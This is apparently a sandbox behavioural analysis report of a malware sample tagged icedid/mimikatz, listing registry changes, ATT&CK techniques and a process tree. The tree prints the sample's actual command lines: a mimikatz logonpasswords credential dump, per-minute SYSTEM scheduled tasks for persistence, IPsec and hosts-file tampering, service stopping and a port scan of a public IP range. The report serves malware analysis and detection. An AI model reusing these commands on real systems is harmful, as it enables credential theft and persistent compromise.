Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xchlyg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ysugeag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ysugeag.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2420	cmd.exe
1464	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0007000000023c82-6.dat	nsis_installer_2
behavioral2/files/0x0011000000023c99-15.dat	nsis_installer_1
behavioral2/files/0x0011000000023c99-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ysugeag.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ysugeag.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ysugeag.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ysugeag.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ysugeag.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ysugeag.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	msytnnqlg.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	ysugeag.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	ysugeag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	ysugeag.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1464	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4948	schtasks.exe
3088	schtasks.exe
536	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found
664	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1692	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	1692	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	516	ysugeag.exe
Token: SeDebugPrivilege	4472	ysugeag.exe
Token: SeDebugPrivilege	3172	vfshost.exe
Token: SeDebugPrivilege	852	msytnnqlg.exe
Token: SeLockMemoryPrivilege	2852	tlulbk.exe
Token: SeLockMemoryPrivilege	2852	tlulbk.exe
Token: SeDebugPrivilege	4740	msytnnqlg.exe
Token: SeDebugPrivilege	2308	msytnnqlg.exe
Token: SeDebugPrivilege	1600	msytnnqlg.exe
Token: SeDebugPrivilege	2164	msytnnqlg.exe
Token: SeDebugPrivilege	852	msytnnqlg.exe
Token: SeDebugPrivilege	3480	msytnnqlg.exe
Token: SeDebugPrivilege	4132	msytnnqlg.exe
Token: SeDebugPrivilege	1792	msytnnqlg.exe
Token: SeDebugPrivilege	2632	msytnnqlg.exe
Token: SeDebugPrivilege	4320	msytnnqlg.exe
Token: SeDebugPrivilege	376	msytnnqlg.exe
Token: SeDebugPrivilege	4648	msytnnqlg.exe
Token: SeDebugPrivilege	4660	msytnnqlg.exe
Token: SeDebugPrivilege	4048	msytnnqlg.exe
Token: SeDebugPrivilege	2324	msytnnqlg.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1692	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe
1692	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe
516	ysugeag.exe
516	ysugeag.exe
4472	ysugeag.exe
4472	ysugeag.exe
1892	xohudmc.exe
2732	xchlyg.exe
2040	ysugeag.exe
2040	ysugeag.exe
1080	ysugeag.exe
1080	ysugeag.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1692 wrote to memory of 2420	1692	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe	83
PID 1692 wrote to memory of 2420	1692	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe	83
PID 1692 wrote to memory of 2420	1692	2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe	83
PID 2420 wrote to memory of 1464	2420	cmd.exe	85
PID 2420 wrote to memory of 1464	2420	cmd.exe	85
PID 2420 wrote to memory of 1464	2420	cmd.exe	85
PID 2420 wrote to memory of 516	2420	cmd.exe	87
PID 2420 wrote to memory of 516	2420	cmd.exe	87
PID 2420 wrote to memory of 516	2420	cmd.exe	87
PID 4472 wrote to memory of 2404	4472	ysugeag.exe	89
PID 4472 wrote to memory of 2404	4472	ysugeag.exe	89
PID 4472 wrote to memory of 2404	4472	ysugeag.exe	89
PID 2404 wrote to memory of 4520	2404	cmd.exe	91
PID 2404 wrote to memory of 4520	2404	cmd.exe	91
PID 2404 wrote to memory of 4520	2404	cmd.exe	91
PID 2404 wrote to memory of 924	2404	cmd.exe	92
PID 2404 wrote to memory of 924	2404	cmd.exe	92
PID 2404 wrote to memory of 924	2404	cmd.exe	92
PID 2404 wrote to memory of 3532	2404	cmd.exe	93
PID 2404 wrote to memory of 3532	2404	cmd.exe	93
PID 2404 wrote to memory of 3532	2404	cmd.exe	93
PID 2404 wrote to memory of 2932	2404	cmd.exe	94
PID 2404 wrote to memory of 2932	2404	cmd.exe	94
PID 2404 wrote to memory of 2932	2404	cmd.exe	94
PID 2404 wrote to memory of 220	2404	cmd.exe	95
PID 2404 wrote to memory of 220	2404	cmd.exe	95
PID 2404 wrote to memory of 220	2404	cmd.exe	95
PID 2404 wrote to memory of 1660	2404	cmd.exe	96
PID 2404 wrote to memory of 1660	2404	cmd.exe	96
PID 2404 wrote to memory of 1660	2404	cmd.exe	96
PID 4472 wrote to memory of 3260	4472	ysugeag.exe	98
PID 4472 wrote to memory of 3260	4472	ysugeag.exe	98
PID 4472 wrote to memory of 3260	4472	ysugeag.exe	98
PID 4472 wrote to memory of 2748	4472	ysugeag.exe	100
PID 4472 wrote to memory of 2748	4472	ysugeag.exe	100
PID 4472 wrote to memory of 2748	4472	ysugeag.exe	100
PID 4472 wrote to memory of 964	4472	ysugeag.exe	102
PID 4472 wrote to memory of 964	4472	ysugeag.exe	102
PID 4472 wrote to memory of 964	4472	ysugeag.exe	102
PID 4472 wrote to memory of 1788	4472	ysugeag.exe	117
PID 4472 wrote to memory of 1788	4472	ysugeag.exe	117
PID 4472 wrote to memory of 1788	4472	ysugeag.exe	117
PID 1788 wrote to memory of 2052	1788	cmd.exe	119
PID 1788 wrote to memory of 2052	1788	cmd.exe	119
PID 1788 wrote to memory of 2052	1788	cmd.exe	119
PID 2052 wrote to memory of 2236	2052	wpcap.exe	120
PID 2052 wrote to memory of 2236	2052	wpcap.exe	120
PID 2052 wrote to memory of 2236	2052	wpcap.exe	120
PID 2236 wrote to memory of 3804	2236	net.exe	122
PID 2236 wrote to memory of 3804	2236	net.exe	122
PID 2236 wrote to memory of 3804	2236	net.exe	122
PID 2052 wrote to memory of 1476	2052	wpcap.exe	123
PID 2052 wrote to memory of 1476	2052	wpcap.exe	123
PID 2052 wrote to memory of 1476	2052	wpcap.exe	123
PID 1476 wrote to memory of 1220	1476	net.exe	125
PID 1476 wrote to memory of 1220	1476	net.exe	125
PID 1476 wrote to memory of 1220	1476	net.exe	125
PID 2052 wrote to memory of 3252	2052	wpcap.exe	126
PID 2052 wrote to memory of 3252	2052	wpcap.exe	126
PID 2052 wrote to memory of 3252	2052	wpcap.exe	126
PID 3252 wrote to memory of 4480	3252	net.exe	128
PID 3252 wrote to memory of 4480	3252	net.exe	128
PID 3252 wrote to memory of 4480	3252	net.exe	128
PID 2052 wrote to memory of 2696	2052	wpcap.exe	129

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2100
- C:\Windows\TEMP\elnhjuuli\tlulbk.exe
  "C:\Windows\TEMP\elnhjuuli\tlulbk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2852

C:\Users\Admin\AppData\Local\Temp\2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-24_9974279b6c54e744b5f2041d67a9913a_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\wuzfiigi\ysugeag.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1464
- - C:\Windows\wuzfiigi\ysugeag.exe
    C:\Windows\wuzfiigi\ysugeag.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:516

C:\Windows\wuzfiigi\ysugeag.exe
C:\Windows\wuzfiigi\ysugeag.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4472
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3532
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:220
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1660
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3260
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2748
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ryivyizlv\vstkqubjh\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1788
- - C:\Windows\ryivyizlv\vstkqubjh\wpcap.exe
    C:\Windows\ryivyizlv\vstkqubjh\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2236
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:3804
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1476
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1220
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3252
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4480
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2696
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        
        PID:3664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3012
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:4188
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:4712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4736
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:3112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ryivyizlv\vstkqubjh\lufbpnmgs.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ryivyizlv\vstkqubjh\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:924
- - C:\Windows\ryivyizlv\vstkqubjh\lufbpnmgs.exe
    C:\Windows\ryivyizlv\vstkqubjh\lufbpnmgs.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ryivyizlv\vstkqubjh\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\ryivyizlv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ryivyizlv\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:4272
- - C:\Windows\ryivyizlv\Corporate\vfshost.exe
    C:\Windows\ryivyizlv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lkbevrlbu" /ru system /tr "cmd /c C:\Windows\ime\ysugeag.exe"
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2824
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "lkbevrlbu" /ru system /tr "cmd /c C:\Windows\ime\ysugeag.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ruugiifbq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\wuzfiigi\ysugeag.exe /p everyone:F"
  2⤵
  PID:1984
